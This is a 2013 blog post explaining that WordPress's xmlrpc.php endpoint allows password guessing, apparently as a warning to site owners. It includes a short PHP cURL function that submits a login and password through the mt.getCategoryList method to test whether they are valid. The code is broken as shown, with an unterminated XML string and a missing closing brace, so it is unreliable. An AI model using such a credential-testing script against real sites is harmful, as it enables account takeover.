Saturday, April 13, 2013

Wordpress password guessing with xmlrpc.php

Recently wordpress powered websites are under a password guessing attack. Since everyone writes about /wp-login.php and /wp-admin and gives tips how to protect these files I'd like to mention that xmlrpc.php file (XML-RPC wordpress "handler") also allows attacker to perform credentials guessing.

I've written simple script in PHP that check if login/password pair is valid via xmlrpc mt.getCategoryList method (however other methods also have login and passwords parameters, just look inside wp-includes/class-wp-xmlrpc-server.php)

function wp_xmlrpc_test($url = '', $login = 'admin', $password = 'admin') {

    $xml = '<?xml version="1.0" encoding="utf-8"?>

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);

    $uri = parse_url($url);
    $header[] = "Host: ".$uri['host'];
    $header[] = "Content-type: text/xml";
    $header[] = "Content-length: ".mb_strlen($xml);

    curl_setopt( $ch, CURLOPT_URL, $url);
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt( $ch, CURLOPT_HTTPHEADER, $header);
    curl_setopt( $ch, CURLOPT_POSTFIELDS, $xml);
    curl_setopt( $ch, CURLOPT_CUSTOMREQUEST, 'POST');

    $result = curl_exec($ch);


    return $result;

var_dump( wp_xmlrpc_test('') );
PS. There is even method for fetching available methods (mt.supportedMethods) :)